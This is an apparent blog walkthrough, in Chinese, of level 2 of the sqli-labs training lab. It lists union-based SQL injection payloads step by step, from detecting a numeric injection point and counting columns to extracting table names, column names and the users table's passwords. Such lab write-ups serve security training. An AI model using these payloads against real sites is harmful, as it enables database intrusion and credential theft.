sqli-labs---第二关

简介: sqli-labs---第二关

1、判断是什么类型注入


?id=1        显示正常


?id=1'       报错


?id=1#      显示正常


?id=1'#     报错


可以知道这里是数字型注入


2、查询有多少列


?id=1 and 1=2 order by 3#   没有报错


?id=1 and 1=2 order by 4#     报错


说明有3列



3、查询数据库名


?id=1 and 1=2 union select 1,database(),3#  

4、查询表名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)


?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

5、查users表中的字段名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)

?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

6、查询字段中的值

?id=1 and 1=2 union select 1,2,group_concat(password) from security.users--+

目录
打赏
0
0
0
0
1
分享
相关文章
|
9月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
56 1
SQLi LABS Less-26
第26关使用GET请求提交参数,我们可以直接在url地址栏中构造payload 源码中过滤了or,and,/*,#,--,空格,斜线,需要想办法绕过
274 0
SQLi LABS Less-26
SQLi LABS Less-25a
第25a关使用GET请求传递参数,在url地址栏中构造payload即可 后端源码中过滤了and和or,但只过滤了一次,我们可以通过双写绕过
240 0
SQLi LABS Less-25a
SQLi LABS Less-29
第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可
231 0
SQLi LABS Less-29
SQLi LABS Less-30
第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号
150 0
SQLi LABS Less-30

热门文章

最新文章

AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等